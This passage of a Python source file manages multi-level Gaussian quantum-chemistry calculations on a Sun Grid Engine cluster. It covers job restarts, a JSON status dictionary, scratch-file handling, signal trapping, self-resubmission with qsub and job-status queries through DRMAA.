mgi_dicts=None):\n \"\"\"\n\n :param str status: The path to the status file to be read for a\n calculation restart. If this is not a restarted job, this should\n be None (the default).\n :param str base_name:\n :param int ind:\n :type geometry: pathlib.Path or str\n :param geometry: File from which to get the starting coordinates. 
This\n argument will take priority if top and traj are also given.\n Currently, this must be an XYZ file, but it shouldn't be too hard\n to implement using openbabel to convert to an XYZ.\n :type top: pathlib.Path or str\n :param top:\n :type traj: pathlib.Path or str\n :param traj:\n :param dict criteria: The criteria for selecting frames from the\n trajectory.\n This is a dict with distance names (or other columns that will\n be in `Universe.data`) as the keys and the values being a\n List-like of min and max values.\n For example, `{'c1_c2': (1.5, 4.0), 'c1_c3': (2.2, 5.1)}` will\n select frames where 'c1_c2' is between 1.5 and 4.0 and 'c1_c3'\n is between 2.2 and 5.1.\n :type react_dist: str or float\n :param react_dist: Distance to set between the two reacting atoms (\n with indices 20 and 39).\n If this argument as given evaluates to False, no movement/changes\n to the geometry will be made.\n :param List[dict] mgi_dicts:\n :return:\n \"\"\"\n if status is not None:\n # TODO this could be done (better?) with a classmethod\n self.rerun = True\n self._status = StatusDict(status)\n self._json_name = status\n try:\n self.args = self.status['args']\n except KeyError:\n self.log.error('Attempting to do a calculation restart, '\n f'but it seems that the status file {status} '\n 'was empty or at least did not have \"args\" in '\n 'it.')\n raise\n a = self.args\n base_name = a['base_name']\n ind = a['ind']\n try:\n geometry = a['geometry']\n except KeyError:\n geometry = None\n top = a['top']\n traj = a['traj']\n criteria = a['criteria']\n react_dist = a['react_dist']\n try:\n mgi_dicts = a['mgi_dicts']\n except KeyError:\n mgi_dicts = a['ugt_dicts']\n self._base_name = self.status['base_name']\n else:\n self.rerun = False\n self.args = {\n 'base_name': base_name,\n 'ind': ind, 'geometry': geometry,\n 'top': top, 'traj': traj,\n 'criteria': criteria,\n 'react_dist': react_dist,\n 'mgi_dicts': mgi_dicts}\n self.oniom = True if 'oniom' in mgi_dicts[0].keys() else False\n self.check_args()\n self._base_name = '{}-ind{}'.format(base_name, ind)\n self._json_name = '{}.json'.format(self._base_name)\n self._status = StatusDict(self._json_name)\n self.geometry = geometry\n self.top = top\n self.traj = traj\n self.criteria = criteria\n self.react_dist = react_dist\n self.mgi_dicts = mgi_dicts\n self.log = logging.getLogger(self.__class__.__name__)\n self.log.setLevel(logging.DEBUG)\n f_handler = logging.FileHandler('{}.log'.format(self._base_name))\n f_handler.setLevel(logging.DEBUG)\n f_formatter = logging.Formatter('%(asctime)s - %(name)s - '\n '%(levelname)s - %(message)s')\n f_handler.setFormatter(f_formatter)\n self.log.addHandler(f_handler)\n self.log.addHandler(handler)\n self.log.debug('Initializing the log')\n self.mem, self.node = None, None\n self.scratch_path: pathlib.Path = None\n self.last_scratch_path: pathlib.Path = None\n self.n_slots, self.last_node = None, None\n self.cwd_path: pathlib.Path = None\n self.output_scratch_path: pathlib.Path = None\n self.chk_ln_path: pathlib.Path = None\n self.h_rt: str = None\n self.stdout_file: str = None\n self.resub_cl: List[str] = None\n self.job_id: str = None\n self.next_job_id: str = None\n self.resubmitted: bool = False\n\n def check_args(self):\n args = self.args.copy()\n geom = args.pop('geometry')\n top, traj = args.pop('top'), args.pop('traj')\n crit = args.pop('criteria')\n if (geom is None and\n (top is None or traj is None or crit is None) and\n (not self.oniom)):\n raise ValueError('either geometry or top, traj, and criteria must '\n 
'be given')\n for key in args:\n if args[key] is None:\n raise ValueError(f'Argument \"{key}\" cannot be None')\n\n @property\n def status(self):\n return self._status\n\n @property\n def current_lvl(self):\n try:\n return self.status['current_lvl']\n except KeyError:\n raise AttributeError('Could not find current level')\n\n @current_lvl.setter\n def current_lvl(self, value):\n if not (isinstance(value, int) or value is None):\n raise TypeError('current_level must be an int or None.'\n f'Given type {type(value)}')\n self.status['current_lvl'] = value\n\n @property\n def between_levels(self):\n # Might need to look for rwf file otherwise should start the\n # calculation again\n self.log.debug('Checking to see if calculation left off between '\n 'calculation levels')\n between = self.status['between_levels']\n if between is None:\n self.log.warning('No key in status for determining if between '\n 'levels currently')\n lvl = self.current_lvl\n if self.status[f'g_in_{lvl}'] == self.status['g_in_curr']:\n out_path = pathlib.Path(\n self.status['g_in_curr']).with_suffix('.out')\n if out_path.exists():\n self._advance_level()\n between = True\n else:\n between = False\n else:\n between = True\n self.status['between_levels'] = between\n return between\n\n @between_levels.setter\n def between_levels(self, value):\n if not isinstance(value, bool):\n raise TypeError(f'between_levels must be a bool, given type '\n f'{type(value)}')\n self.status['between_levels'] = value\n\n @property\n def cleaned_up(self):\n cleaned = self.status['cleaned_up']\n if cleaned is None:\n self.log.warning('Could not find \"cleaned_up\" in status. Assuming '\n 'dirty')\n cleaned = False\n self.status['cleaned_up'] = cleaned\n return cleaned\n\n @cleaned_up.setter\n def cleaned_up(self, value):\n if not isinstance(value, bool):\n raise TypeError(f'cleaned_up must be a bool, given type '\n f'{type(value)}')\n self.status['cleaned_up'] = value\n\n def _startup_tasks(self):\n \"\"\"\n Some startup tasks to set variables for later use\n\n This requires the environment variables HOSTNAME and NSLOTS be set.\n :return: None\n \"\"\"\n self.log.debug('Running some introductory tasks and setting variables')\n try:\n node = os.environ['HOSTNAME'].split('.')[0]\n except KeyError:\n self.log.exception('Could not find HOSTNAME!')\n raise\n self.node = node\n scratch_path = pathlib.Path('/net/{}/scratch/theavey'.format(node))\n scratch_path.mkdir(exist_ok=True)\n self.scratch_path = scratch_path\n try:\n self.job_id = os.environ['JOB_ID']\n except KeyError:\n self.log.exception('Could not find JOB_ID!')\n raise\n self.mem = thtools.job_tools.get_node_mem()\n try:\n n_slots = int(os.environ['NSLOTS'])\n except KeyError:\n self.log.exception('Could not find NSLOTS!')\n raise\n self.n_slots = n_slots\n self.h_rt = self._get_h_rt()\n self.log.info(f'Running on {node} using {n_slots} cores and up to '\n f'{self.mem} GB mem for {self.h_rt} seconds')\n try:\n self.stdout_file = os.environ['SGE_STDOUT_PATH']\n self.log.debug(f'Using stdout path: {self.stdout_file}')\n except KeyError:\n self.log.exception('Could not find SGE_STDOUT_PATH!')\n raise\n if self.rerun:\n self.last_node = self.status['current_node']\n self.status['last_node'] = self.last_node\n node_list = self.status['node_list']\n self.last_scratch_path = pathlib.Path(self.status[\n 'current_scratch_dir'])\n self.status['last_scratch_dir'] = str(self.last_scratch_path)\n self._get_chk_ln_path()\n self._get_output_scratch_path()\n else:\n self.status['args'] = self.args\n 
self.status['base_name'] = self._base_name\n node_list = []\n self.status['node_list'] = node_list + [node]\n self.status['current_node'] = node\n self.status['current_scratch_dir'] = str(scratch_path)\n self.status['job_id'] = self.job_id\n self.cwd_path = pathlib.Path('.').resolve()\n self.status['cwd'] = str(self.cwd_path)\n self.log.info('Submitted from {} and will be running in {}'.format(\n self.cwd_path, self.scratch_path))\n self._make_resub_sh_and_cl()\n\n def _get_output_scratch_path(self):\n self.log.debug('Getting path to scratch output')\n output_scratch_path_ = self.status['output_scratch_path']\n if output_scratch_path_ is not None:\n self.output_scratch_path = pathlib.Path(\n output_scratch_path_)\n else:\n self.output_scratch_path = self.last_scratch_path.joinpath(\n self.status['g_in_curr']).with_suffix('.out')\n\n def _get_chk_ln_path(self):\n self.log.debug('Getting path to linked chk file')\n chk_ln_path_ = self.status['chk_ln_path']\n if chk_ln_path_ is not None:\n self.chk_ln_path = pathlib.Path(chk_ln_path_)\n else:\n self.chk_ln_path = pathlib.Path(\n f'{self._base_name}-running.chk').resolve()\n\n @log_exception\n def run_calc(self):\n \"\"\"\n The primary function to start (or restart) running a calculation\n\n :return: None\n \"\"\"\n self.log.debug('Welcome. Just starting to run this calculation')\n self._startup_tasks()\n if self.rerun:\n self.log.info('loaded previous status file: {}'.format(\n self._json_name))\n self.resume_calc()\n else:\n self.log.warning('No previous status file found. '\n 'Starting new calculation?')\n self.new_calc()\n\n def _make_rand_xyz(self):\n self.log.debug('Making XYZ file to start calculation')\n import tables\n u = paratemp.Universe(self.top, self.traj, verbosity=0)\n while True:\n try:\n u.read_data()\n break\n except tables.HDF5ExtError:\n self.log.warning(\n 'HDF5ExtError raised. Likely because trying to read the '\n 'store at the same time as another process. 
Waiting 5 '\n 'seconds and trying again.')\n time.sleep(5)\n continue\n frames = u.select_frames(self.criteria, 'QM_frames')\n select = random.choice(frames)\n self.status['source_frame_num'] = int(select)\n system: mda.AtomGroup = u.select_atoms('all')\n xyz_name = self._base_name + '.xyz'\n with mda.Writer(xyz_name, system.n_atoms) as w:\n u.trajectory[select]\n for frag in u.atoms.fragments:\n mda.lib.mdamath.make_whole(frag)\n # This should at least make the molecules whole if not\n # necessarily in the correct unit cell together.\n w.write(system)\n self.log.info(f'Wrote xyz file from frame {select} to {xyz_name}')\n return pathlib.Path(xyz_name).resolve()\n\n def _move_reactant_atoms(self, xyz_path):\n self.log.debug('Moving reactant atoms (20 and 39) to '\n f'{self.react_dist}')\n xyz_name = str(xyz_path)\n bak_name = xyz_name + '.bak'\n paratemp.copy_no_overwrite(xyz_name, bak_name)\n self.status['original_xyz'] = bak_name\n self.log.info(f'Copied original geometry to {bak_name}')\n xyz = XYZ(xyz_name)\n diff = xyz.coords[19] - xyz.coords[38]\n direction = diff / np.linalg.norm(diff)\n xyz.coords[19] = xyz.coords[38] + self.react_dist * direction\n xyz.write(xyz_name)\n self.log.info(f'Wrote updated xyz file to {xyz_name}')\n\n def new_calc(self):\n self.log.debug('Setting up a new calculation')\n self.current_lvl = 0\n if self.geometry is not None:\n self.log.debug(f'Using provided geometry from {self.geometry}')\n xyz_path = pathlib.Path(self.geometry).resolve()\n elif self.oniom:\n self.log.debug('Using geometry from ONIOM inputs')\n xyz_path = 'oniom_input'\n else:\n xyz_path = self._make_rand_xyz()\n if self.react_dist:\n if self.oniom:\n self.log.warning('ONIOM calculation with react_dist not '\n 'implemented. Ignoring react_dist.')\n else:\n self._move_reactant_atoms(xyz_path)\n self.status['starting_xyz'] = str(xyz_path)\n if not self.oniom and not xyz_path.exists():\n raise FileNotFoundError('Could not find start geometry that was '\n f'supposed to be at {xyz_path}')\n com_name = self._make_g_in(xyz_path)\n self._setup_and_run(com_name)\n\n def _setup_and_run(self, com_name):\n self.log.debug('Starting setup to run Gaussian')\n bn = self._base_name\n chk_ln_path = pathlib.Path(f'{bn}-running.chk').resolve()\n self.chk_ln_path = chk_ln_path\n self.status['chk_ln_path'] = str(chk_ln_path)\n chk_ln_path.symlink_to(self.scratch_path.joinpath(f'{bn}.chk'))\n self.log.info(f'Linked checkpoint file as {chk_ln_path}')\n if not self.resubmitted:\n self.resub_calc()\n self.status['manual_input'] = None\n self.status['manual_restart'] = None\n self.status['g_in_curr'] = com_name\n self.cleaned_up = False\n self.between_levels = False\n self.status['calc_cutoff'] = None\n self.status['gaussian_failed'] = None\n killed = self._run_gaussian(com_name)\n self.status['calc_cutoff'] = killed\n if killed:\n self.log.info('Exited from function running Gaussian because '\n 'SIGUSR2')\n else:\n try:\n self._check_normal_completion(self.output_scratch_path)\n self.log.info(f'Seemed to correctly finish level '\n f'{self.current_lvl} calculation. 
Moving on to '\n f'next level')\n self._advance_level()\n finally:\n self._copy_and_cleanup()\n self._next_calc()\n\n def _advance_level(self):\n self.log.debug(f'Advancing from {self.current_lvl}')\n self.between_levels = True\n self.current_lvl += 1\n\n def _make_g_in(self, xyz_path):\n self.log.debug(f'Making new Gaussian input from {xyz_path}')\n bn = self._base_name\n lvl = self.current_lvl\n com_name = f'{bn}-lvl{lvl}.com'\n try:\n mgi_dict = self.mgi_dicts[lvl]\n except IndexError:\n self.log.warning('Seems that there are no more calculation '\n 'levels to complete')\n raise self.NoMoreLevels\n tools.make_gaussian_input(\n out_file=com_name,\n xyz=str(xyz_path),\n job_name=bn,\n checkpoint=f'{bn}.chk',\n rwf=f'{bn}.rwf',\n nproc=self.n_slots, mem=self.mem,\n **mgi_dict\n )\n self.log.info('Wrote Gaussian input for '\n f'level {lvl} job to {com_name}')\n self.status[f'g_in_{lvl}'] = com_name\n return com_name\n\n def _run_gaussian(self, com_name):\n self.log.debug('Doing final setup to run Gaussian')\n out_name = com_name.replace('com', 'out')\n com_path: pathlib.Path = self.cwd_path.joinpath(com_name)\n if not com_path.exists():\n raise FileNotFoundError('Gaussian input {} not found in '\n '{}'.format(com_name, self.cwd_path))\n out_path: pathlib.Path = self.scratch_path.joinpath(out_name)\n self.output_scratch_path = out_path\n self.status['output_scratch_path'] = str(out_path)\n old_sigusr1 = signal.signal(signal.SIGUSR1, self._signal_catch_done)\n old_sigusr2 = signal.signal(signal.SIGUSR2, self._signal_catch_time)\n cl = ['g16', ]\n killed = False\n with com_path.open('r') as f_in, out_path.open('w') as f_out:\n self.log.info('Starting Gaussian with input {} and writing '\n 'output to {}'.format(com_path, out_path))\n self.status['running'] = True\n proc = subprocess.Popen(cl, stdin=f_in, stdout=f_out,\n cwd=str(self.scratch_path))\n self.log.info('Started Gaussian; waiting for it to finish or '\n 'timeout')\n try:\n thread = threading.Thread(target=self._check_proc, args=(proc,))\n thread.start()\n signal.pause()\n except self.TimesUp:\n killed = True\n proc.terminate() # Should be within `with` clause?\n self.log.info('Gaussian process terminated because of SIGUSR2')\n except self.GaussianDone:\n self.log.info('Gaussian process completed')\n finally:\n signal.signal(signal.SIGUSR1, old_sigusr1)\n signal.signal(signal.SIGUSR2, old_sigusr2)\n self.status['running'] = False\n return killed\n\n def _signal_catch_time(self, signum, frame):\n self.log.warning(f'Caught {signal.Signals(signum).name} signal! '\n 'Trying to quit Gaussian')\n raise self.TimesUp\n\n def _signal_catch_done(self, signum, frame):\n self.log.warning(f'Caught {signal.Signals(signum).name} signal! '\n f'Likely, this was because Gaussian process exited')\n raise self.GaussianDone\n\n def _check_proc(self, proc):\n self.log.debug('Started process to check on Gaussian completion')\n while proc.poll() is None:\n time.sleep(15)\n self.log.warning('Gaussian process no longer running. 
Sending SIGUSR1')\n os.kill(os.getpid(), signal.SIGUSR1)\n\n def _copy_and_cleanup(self):\n self.log.debug('Attempting to copy back files and unlink chk file')\n com_name: str = self.status['g_in_curr']\n cc = self.status['calc_cutoff']\n killed: bool = True if cc is None else cc\n if killed:\n scratch_path = pathlib.Path(self.status['last_scratch_dir'])\n else:\n scratch_path = self.scratch_path\n if not killed:\n out_path = pathlib.Path(com_name.replace('com', 'out'))\n if self.status['gaussian_failed'] is True:\n out_path = self._make_unique_output_path(\n f'{out_path.stem}-failed')\n else:\n out_path = self._make_unique_output_path(com_name[:-4])\n try:\n paratemp.copy_no_overwrite(str(self.output_scratch_path),\n str(out_path))\n self.log.debug(f'Copied back output file to {out_path}')\n except FileExistsError:\n if filecmp.cmp(str(self.output_scratch_path), str(out_path),\n shallow=False):\n self.log.debug(\"Don't need to copy back output as it's already \"\n f\"at {out_path}\")\n else:\n self.log.error('Output files differ; unable to copy back.\\n'\n f'New: {self.output_scratch_path}\\n'\n f'Existing: {out_path}')\n raise\n if self.chk_ln_path.exists():\n self.chk_ln_path.unlink()\n self.log.debug(f'Unlinked checkpoint run file: {self.chk_ln_path}')\n chk_name = f'{self._base_name}.chk'\n scr_chk_path = scratch_path.joinpath(chk_name)\n if scr_chk_path.exists():\n shutil.copy(str(scr_chk_path), chk_name)\n self.log.debug(f'Copied back checkpoint file to {chk_name}')\n else:\n self.log.debug(f'chk file not found at {scr_chk_path} so not '\n f'copied back')\n self.cleaned_up = True\n\n def _make_unique_output_path(self, com_base_name):\n outs = [str(p) for p in self.cwd_path.glob(com_base_name + '-*.out')]\n if not outs:\n new_out = f'{com_base_name}-1.out'\n else:\n def get_ind(s):\n match = re.search(r'(\\d+)\\.out', s)\n return int(match.group(1))\n outs.sort(key=get_ind)\n ind = get_ind(outs[-1])\n new_out = f'{com_base_name}-{ind+1}.out'\n return pathlib.Path(new_out).resolve()\n\n def _check_normal_completion(self, filepath):\n self.log.debug('Attempting to check for completion status of Gaussian')\n output = subprocess.check_output(['tail', '-n', '1', str(filepath)],\n universal_newlines=True)\n if 'normal termination' not in output.lower():\n self.log.error(f'Abnormal termination of Gaussian job in output: '\n f'{filepath}')\n self._qdel_next_job()\n self.status['gaussian_failed'] = True\n raise self.GaussianError('Gaussian did not finish normally. '\n f'See output: {filepath}')\n self.status['gaussian_failed'] = False\n self.log.info(f'Normal termination of Gaussian job! Output at '\n f'{filepath}')\n\n def resub_calc(self):\n self.log.info(f'resubmitting job with the following commandline:\\n'\n f'{self.resub_cl}')\n proc = subprocess.run(self.resub_cl,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n self.log.info(f'The following was returned from qsub:\\n{proc.stdout}')\n if proc.returncode:\n self.log.exception('Resubmission of calculation failed with '\n f'returncode {proc.returncode}')\n match = re.search(r'(\\d+)\\s\\(\"(\\w.*)\"\\)', proc.stdout)\n if match:\n self.next_job_id = match.group(1)\n self.resubmitted = True\n else:\n self.log.warning('Could not find submitted job id from qsub '\n 'command. 
Will not be able to cancel it if this '\n 'Calc is completed')\n\n def _make_resub_sh_and_cl(self):\n \"\"\"\n Make command line for a calculation for resuming in another job\n\n Requires SGE_STDOUT_PATH and JOB_ID for running `qstat`\n :return: None\n \"\"\"\n self.log.debug('Setting up for calculation resubmission')\n arg_d = dict(pe=f'omp {self.n_slots}', M='[email protected]', m='eas',\n l=f'h_rt={self.h_rt}', N=self._base_name, j='y',\n o=self.stdout_file, notify='', hold_jid=self.job_id)\n resub_dir_path = self.cwd_path.joinpath('resub_scripts')\n resub_dir_path.mkdir(exist_ok=True)\n sub_sh_path = resub_dir_path.joinpath(f'resub-{self._base_name}.sh')\n curr_file = pathlib.Path(__file__).resolve()\n with sub_sh_path.open('w') as sub_sh:\n sub_sh.write('#!/bin/bash -l\\n\\n')\n for key in arg_d:\n sub_sh.write(f'#$ -{key} {arg_d[key]}\\n')\n sub_sh.write(obabel_module_lines)\n sub_sh.write(f'\\n{curr_file} --restart {self._json_name} &\\n\\n')\n sub_sh.write(signal_catch_lines)\n self.log.info(f'Wrote resubmission script to {sub_sh_path}')\n self.resub_cl = ['qsub', str(sub_sh_path)]\n\n def _get_h_rt(self):\n \"\"\"\n Find the amount of time requested for the currently running job\n\n Requires JOB_ID and uses `qstat`.\n :return:\n \"\"\"\n self.log.debug('Attempting to find requested job run time')\n cl = ['qstat', '-j', self.job_id]\n output: str = subprocess.check_output(cl, universal_newlines=True)\n for line in output.splitlines():\n m = re.search(r'h_rt=(\\d+)', line)\n if m:\n self.log.debug(f'Found required info: {m.group(0)}')\n return m.group(1)\n self.log.error('Could not find requested run time! Assuming 24 hours')\n return '24:00:00'\n\n def resume_calc(self):\n self.log.debug('Attempting to resume calculation')\n if not self.cleaned_up:\n self._copy_and_cleanup()\n manual_input = self.status['manual_input']\n manual_restart = self.status['manual_restart']\n if manual_input is not None:\n com_name = self._update_g_in_memory_cpu_request(manual_input)\n self._setup_and_run(com_name)\n elif self.between_levels:\n self._copy_in_restart('chk')\n self._next_calc()\n else:\n if manual_restart is not None:\n com_name = self._update_g_in_memory_cpu_request(manual_restart)\n else:\n com_name = self._update_g_in_for_restart()\n self._copy_in_restart()\n self._setup_and_run(com_name)\n\n def _copy_in_restart(self, file='both'):\n f_type_options = ['chk', 'rwf']\n if file == 'both':\n f_types = f_type_options\n else:\n if file not in f_type_options:\n self.log.warning(f'unrecognized file type {file}; trying it '\n f'anyway...')\n f_types = [file]\n self.log.debug(f'Copying {f_types} files to scratch for restart')\n bn = self._base_name\n for f_type in f_types:\n old_path = self.last_scratch_path.joinpath(f'{bn}.{f_type}')\n if not old_path.exists():\n mes = f'Could not find old {f_type} file at {old_path}'\n self.log.error(mes)\n raise FileNotFoundError(mes)\n new_path = self.scratch_path.joinpath(old_path.name)\n if new_path.exists() and (new_path.stat().st_mtime >\n old_path.stat().st_mtime):\n self.log.debug(f'current {f_type} file newer than old '\n f'({old_path}). 
Not replacing.')\n else:\n try:\n shutil.copy(str(old_path), str(self.scratch_path))\n except shutil.SameFileError:\n self.log.info('Working on the same node; no need to '\n f'copy {f_type} file')\n self.log.info(f'If necessary, copied {f_types} files from last '\n f'scratch directory: {self.last_scratch_path}\\nto '\n f'node scratch dir: {self.scratch_path}')\n\n def _update_g_in_memory_cpu_request(self, com_name=None):\n self.log.debug('Updating Gaussian memory and cpu request for this node')\n com_name = self.status['g_in_curr'] if com_name is None else com_name\n lines = open(com_name, 'r').readlines()\n paratemp.copy_no_overwrite(com_name, com_name+'.bak')\n with open(com_name, 'w') as f_out:\n for line in lines:\n if '%mem=' in line:\n line = f'%mem={self.mem}GB\\n'\n elif '%cpu=' in line:\n line = f'%cpu=0-{int(self.n_slots)-1}\\n'\n f_out.write(line)\n os.remove(pathlib.Path(com_name+'.bak'))\n self.log.info(f'Updated Gaussian input to use all the memory '\n f'on this node')\n return com_name\n\n def _update_g_in_for_restart(self):\n self.log.debug('Updating Gaussian input for restart')\n com_name = self._update_g_in_memory_cpu_request()\n lines = open(com_name, 'r').readlines()\n paratemp.copy_no_overwrite(com_name, com_name+'.bak')\n with open(com_name, 'w') as f_out:\n for line in lines:\n if line.startswith('#'):\n line = '# Restart\\n'\n f_out.write(line)\n os.remove(pathlib.Path(com_name+'.bak'))\n self.log.info(f'Updated Gaussian input to do a calculation restart')\n return com_name\n\n def _next_calc(self):\n self.log.debug('Moving on to next level calculation')\n out_path = pathlib.Path(self.status['g_in_curr']).with_suffix('.out')\n try:\n xyz_path_str = self._create_opt_xyz(out_path)\n except:\n self.log.error(f'Failed to create xyz file for {out_path}')\n self._qdel_next_job()\n raise\n try:\n com_name = self._make_g_in(xyz_path_str)\n except self.NoMoreLevels:\n self.log.info('No more calculation levels to complete! Completed '\n f'all {self.current_lvl} levels')\n self._qdel_next_job()\n return None\n except FileExistsError:\n self.log.warning(f'Gaussian input file for level '\n f'{self.current_lvl} already exists! This file '\n f'will be used to start a new calculation')\n com_name = f'{self._base_name}-lvl{self.current_lvl}.com'\n self._setup_and_run(com_name)\n # This will get nested, but likely no more than twice (unless the\n # optimizations are very quick). This shouldn't be an issue,\n # and should never get near the recursion limit unless something goes\n # very wrong.\n\n def _qdel_next_job(self):\n self.log.debug('Deleting the re-submitted job from the queue')\n if self.next_job_id is not None:\n cl = ['qdel', self.next_job_id]\n output = subprocess.check_output(cl, stderr=subprocess.STDOUT)\n self.log.info('Cancelled job resubmission. 
qdel said: '\n f'{output}')\n else:\n self.log.warning('Do not know job id of resubmission so '\n 'unable to delete it.')\n\n def _create_opt_xyz(self, out_path: pathlib.Path):\n self.log.debug('Converting output to xyz file for next level')\n xyz_path_str = str(out_path.with_suffix('.xyz'))\n success = self._run_obabel(out_path, xyz_path_str)\n if success:\n return xyz_path_str\n fchk_path = self._create_fchk()\n success = self._run_obabel(fchk_path, xyz_path_str)\n if success:\n return xyz_path_str\n raise self.NoOptXYZError\n\n def _run_obabel(self, out_path: pathlib.Path, xyz_path_str: str):\n self.log.debug('Running openbabel to convert geometry')\n cl = ['obabel', str(out_path), '-O',\n xyz_path_str]\n proc = subprocess.run(cl, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n if not (proc.returncode or\n '1 molecule converted' not in proc.stdout.lower()):\n self.log.info(f'Converted optimized structure to xyz file: '\n f'{xyz_path_str}')\n return True\n mes = (f'obabel failed to convert {out_path} to an xyz file. '\n f'It said: {proc.stdout}')\n self.log.warning(mes)\n return False\n\n def _create_fchk(self):\n self.log.debug('Converting chk to formatted checkpoint')\n chk_name = f'{self._base_name}.chk'\n fchk_name = f'{self._base_name}.fchk'\n cl = ['formchk', chk_name, fchk_name]\n proc = subprocess.run(cl, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n self.log.debug(f'Ran Gaussian formchk and it said: {proc.stdout}')\n proc.check_returncode()\n return pathlib.Path(fchk_name).resolve()\n\n class SignalMessage(Exception):\n pass\n\n class TimesUp(SignalMessage):\n pass\n\n class GaussianDone(SignalMessage):\n pass\n\n class NoMoreLevels(Exception):\n pass\n\n class GaussianError(Exception):\n pass\n\n class NoOptXYZError(Exception):\n pass\n\n\nclass StatusDict(dict):\n \"\"\"\n A dict subclass that writes the dict to disk every time a value gets set\n\n Note, any other action on the dict will not currently trigger a write to\n disk.\n\n The dict will be written in JSON to the path given at instantiation. If\n there is already a file at that path, it will be read and used as\n the initial definition of the dict. Otherwise, it will be instantiated as\n an empty dict.\n\n Keys in dictionary:\n\n * args: a Dict of the arguments given when starting the calculation.\n\n * current_node: Name of the node on which the job is currently running.\n This is set during :func:`Calc._startup_tasks`. It should be formatted as\n 'scc-xxx' (e.g., 'scc-na1').\n\n * last_node: This is set during :func:`Calc._startup_tasks` if it's a\n restarted calculation. It will be set from the last 'current_node'.\n\n * node_list: This is a list of past and current nodes on which this\n calculation has run.\n\n * current_scratch_dir: str of the absolute path to the scratch directory\n on the current node.\n\n * base_name: the base name for this calculation including the index of\n this calculation.\n\n * cwd: str of the absolute path from which the current calculation was\n submitted.\n\n * last_scratch_dir: str of the absolute path to the scratch directory\n from which the last job was run, if this is not a new calculation.\n\n * source_frame_num: The index of the frame in the trajectory that was\n used to create the initial configuration.\n\n * original_xyz: str of the name of file with the coordinates as they were\n taken from the trajectory, before moving the reacting atoms to the\n correct distance. 
This will not be set if no distance correction is made.\n\n * starting_xyz: str of the name of the file with the coordinates for\n starting the calculation, before any optimization.\n\n * g_in_0: str of the name of the file with the initial input to Gaussian.\n * g_in_curr: str of the name of the currently running or most recent\n Gaussian input\n\n * current_lvl: int of current level of calculation running (max is len(\n ugt_dicts))\n\n * calc_cutoff: bool of whether the job finished or if it was cutoff\n because of running out of time.\n\n * cleaned_up: bool of whether linked files and old outputs have been\n cleaned up and copied back to the starting directory\n\n * chk_ln_path: str of path to where checkpoint file is linked in\n submission directory\n\n * output_scratch_path: str of path to where output is in the scratch\n directory\n\n * job_id: str of the job number from the sun grid system\n\n * between_levels: bool of if between levels (not in the middle of a\n calculation). Useful for figuring out where to restart.\n\n * gaussian_failed: bool of if Gaussian terminated abnormally. Will be None\n while Gaussian is running and before it gets checked.\n\n * manual_input: str of path to an input file to use to continue the\n calculation. Will not use the chk and rwf files.\n\n * manual_restart: str of path to an input file to use to restart the\n calculation. This will copy in the chk and rwf files that should be\n referenced in the header of the input.\n\n \"\"\"\n def __init__(self, path):\n self.path = pathlib.Path(path).resolve()\n if pathlib.Path(path).is_file():\n d = json.load(open(path, 'r'))\n super(StatusDict, self).__init__(d)\n else:\n super(StatusDict, self).__init__()\n self.log = logging.getLogger(self.__class__.__name__)\n self.temp_path = self.path.with_suffix('.json.new')\n\n def __setitem__(self, key, value):\n try:\n super(StatusDict, self).__setitem__(key, value)\n json.dump(self, open(self.temp_path, 'w'), indent=4)\n os.rename(str(self.temp_path), str(self.path))\n except Exception:\n self.log.exception('Exception raised when trying to write status '\n 'file!')\n raise\n\n _defaults = dict( # args=dict(), # want this to be an Error\n current_node=None,\n last_node=None,\n node_list=list(),\n current_scratch_dir=None,\n base_name=None,\n cwd=None,\n last_scratch_dir=None,\n source_frame_num=None,\n original_xyz=None,\n starting_xyz=None,\n # current_lvl=None, # want this to be an Error\n calc_cutoff=None, cleaned_up=None,\n chk_ln_path=None, output_scratch_path=None,\n job_id=None,\n between_levels=None, gaussian_failed=None,\n manual_input=None, manual_restart=None,\n g_in_curr=None,\n **{f'g_in_{i}': None for i in range(20)})\n\n def __getitem__(self, item):\n try:\n return super(StatusDict, self).__getitem__(item)\n except KeyError as ke:\n self.log.warning(f'Tried to access non-existent key \"{item}\" from '\n 'StatusDict')\n try:\n return self._defaults[item]\n except KeyError:\n raise ke\n\n\ndef _check_environ():\n log.debug('Checking and setting environment variables')\n if os.environ.get('SGE_ROOT', None) is None:\n raise ValueError('SGE_ROOT is not defined')\n if os.environ.get('SGE_CELL', None) is None:\n log.debug('Setting SGE_CELL to default')\n os.environ['SGE_CELL'] = 'default'\n if os.environ.get('DRMAA_LIBRARY_PATH', None) is None:\n lib_path = pathlib.Path(\n f\"{os.environ['SGE_ROOT']}/lib/linux-x64/libdrmaa.so\").resolve()\n log.debug(f'Setting DRMAA_LIBRARY_PATH to {lib_path}')\n os.environ['DRMAA_LIBRARY_PATH'] = str(lib_path)\n\n\ndef 
_process_paths(paths) -> List[pathlib.Path]:\n log.debug('Processing input paths list')\n statuses = list()\n if not paths:\n log.debug('paths was empty; using current directory')\n paths = [pathlib.Path.cwd()]\n for path in paths:\n path = pathlib.Path(path)\n if path.is_file():\n statuses.append(path)\n continue\n if path.is_dir():\n jsons = path.glob('*.json')\n for j in jsons:\n statuses.append(j)\n log.debug(f'Found {len(statuses)} json files to process')\n return statuses\n\n\ndef get_job_statuses(paths: List[str], df: pd.DataFrame = None):\n log.info('Getting job statuses')\n _check_environ()\n import drmaa\n log.debug('Imported DRMAA package')\n statuses = _process_paths(paths)\n if df is None:\n df = pd.DataFrame(\n {'system': ['str'], 'index': [0],\n 'running_sr': [False], 'running_qr': [False],\n 'current_lvl': [0], 'gaussian_failed': [False]},\n )\n df.drop(labels=[0], axis=0, inplace=True)\n signal.alarm(10) # try to open session for 10 seconds (freezes with some\n # unidentified problems with drmaa\n with drmaa.Session() as session:\n signal.alarm(0) # clear timer if successfully opened session\n log.debug('Opened DRMAA session and finding job statuses')\n for f_status in statuses:\n log.debug(f'Trying file {f_status}')\n name = f_status.stem\n m = re.search(r'(.*)-ind(\\d+)', name)\n if m is None:\n continue\n system, index = m.groups()\n d_status = json.load(f_status.open('r'))\n running = bool(d_status['running'])\n job_id = d_status['job_id']\n try:\n q_running = session.jobStatus(job_id)\n except drmaa.InvalidJobException:\n q_running = None\n lvl = int(d_status['current_lvl'])\n failed = d_status['gaussian_failed']\n df.loc[name] = system, int(index), running, q_running, lvl, failed\n return df.sort_values(['system', 